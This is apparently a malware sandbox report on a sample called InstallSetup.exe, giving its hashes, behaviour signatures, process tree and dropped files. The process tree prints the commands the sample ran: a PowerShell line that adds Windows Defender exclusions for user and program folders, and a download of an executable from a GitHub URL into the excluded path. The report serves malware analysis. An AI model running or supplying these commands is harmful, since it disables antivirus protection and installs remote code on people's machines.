Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

10

CleanerV2.exe

windows7-x64

10

CleanerV2.exe

windows10-2004-x64

10

InstallSetup.exe

windows7-x64

8

InstallSetup.exe

windows10-2004-x64

10

Motrix-1.8.19-x64.exe

windows7-x64

7

Motrix-1.8.19-x64.exe

windows10-2004-x64

7

Rust_22_02...np.exe

windows7-x64

3

Rust_22_02...np.exe

windows10-2004-x64

3

SoftCPU.exe

windows7-x64

3

SoftCPU.exe

windows10-2004-x64

7

chrome.exe

windows7-x64

8

chrome.exe

windows10-2004-x64

8

client.exe

windows7-x64

10

client.exe

windows10-2004-x64

10

goodboy.exe

windows10-2004-x64

10

install.exe

windows7-x64

10

install.exe

windows10-2004-x64

10

Resubmissions

14/03/2025, 13:03

250314-qacneavkv5 10

Analysis

  • max time kernel
    143s
  • max time network
    148s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    14/03/2025, 13:03

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    InstallSetup.exe

  • Size

    383KB

  • MD5

    18bc0a0e4aab55b86cd1f41476829918

  • SHA1

    977bd945d4f4a763f36cbcc703029340327d4f40

  • SHA256

    c5a145def78019e54b7f092ff967d25687b4955ec176ce53eab5916d954427be

  • SHA512

    ca5206d805bfccfea6a8ed55911792d12df23fb185dadcb4d3d3a87943f1457d74045f4e611e2e73631c53b6bf10c4d6ef2e38e30686436ccead2fdf1bf72b68

  • SSDEEP

    6144:yjIjZkWXdi1sWAQLYplIZlQ/WvuaentzFIkJLgJUQjyOxyAOzG+RaJs6GN1l:yjIjdiO8clZWeVF9JLgizc+ILk

Score
8/10
discoveryexecution

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

    execution
  • Downloads MZ/PE file 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SendNotifyMessage 1 IoCs
  • Suspicious use of WriteProcessMemory 16 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\InstallSetup.exe
    "C:\Users\Admin\AppData\Local\Temp\InstallSetup.exe"
    1⤵
    • Downloads MZ/PE file
    • Loads dropped DLL
    • System Location Discovery: System Language Discovery
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:2120
    • C:\Users\Admin\AppData\Local\Temp\D6F0.tmp.exe
      "C:\Users\Admin\AppData\Local\Temp\D6F0.tmp.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:2896
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\pubilnuf', 'C:\Users', 'C:\ProgramData'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2876
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command "Add-MpPreference -ExclusionPath 'C:\pubilnuf', 'C:\Users', 'C:\ProgramData'"
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2652
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest -Uri 'https://github.com/deripascod/coderoom/raw/refs/heads/main/vktyhkakwdrg.exe' -OutFile 'C:\pubilnuf\downloaded_file.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1748
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command "Invoke-WebRequest -Uri 'https://github.com/deripascod/coderoom/raw/refs/heads/main/vktyhkakwdrg.exe' -OutFile 'C:\pubilnuf\downloaded_file.exe'"
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2620

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
    Filesize

    7KB

    MD5

    c9e08b08af381b272ad50694147ce963

    SHA1

    30610483b2d14164c0ca318b520453fc0792a0eb

    SHA256

    91c0281debff0bf6e125a423c971f9903dae79a2bdc98aba5657c77f905f175f

    SHA512

    8e9b7957f7f1aa287b0b0f59678c025a33e3324587f9141d6844eab0dd5d799462c7a3e77224edc5849870088ca9a8244031e87a6f8937a56c3408de274065c8

    Download Submit

  • \Users\Admin\AppData\Local\Temp\D6F0.tmp.exe
    Filesize

    314KB

    MD5

    c3f1f2f2c303a518b957c6daf9abe66f

    SHA1

    87e5aed6195fb9811ce40a006b8d757c3577a410

    SHA256

    9a2163b925e9ba9aa6e17b0e6c813c36f0dbc3f2b8c6e74d1005553aca99e22c

    SHA512

    651695405631daa70d79a45511795e244d86daa6b9982e561dc5eaa7db167307082d55b2d0b1a0650cbd250e01ff40ab97693b5a257c5d6757265ad1e2e2fccc

    Download Submit

  • memory/2620-33-0x000000001B760000-0x000000001BA42000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/2620-34-0x0000000002710000-0x0000000002718000-memory.dmp

    Filesize

    32KB

    Download

  • memory/2652-26-0x000000001B740000-0x000000001BA22000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/2652-27-0x0000000002290000-0x0000000002298000-memory.dmp

    Filesize

    32KB

    Download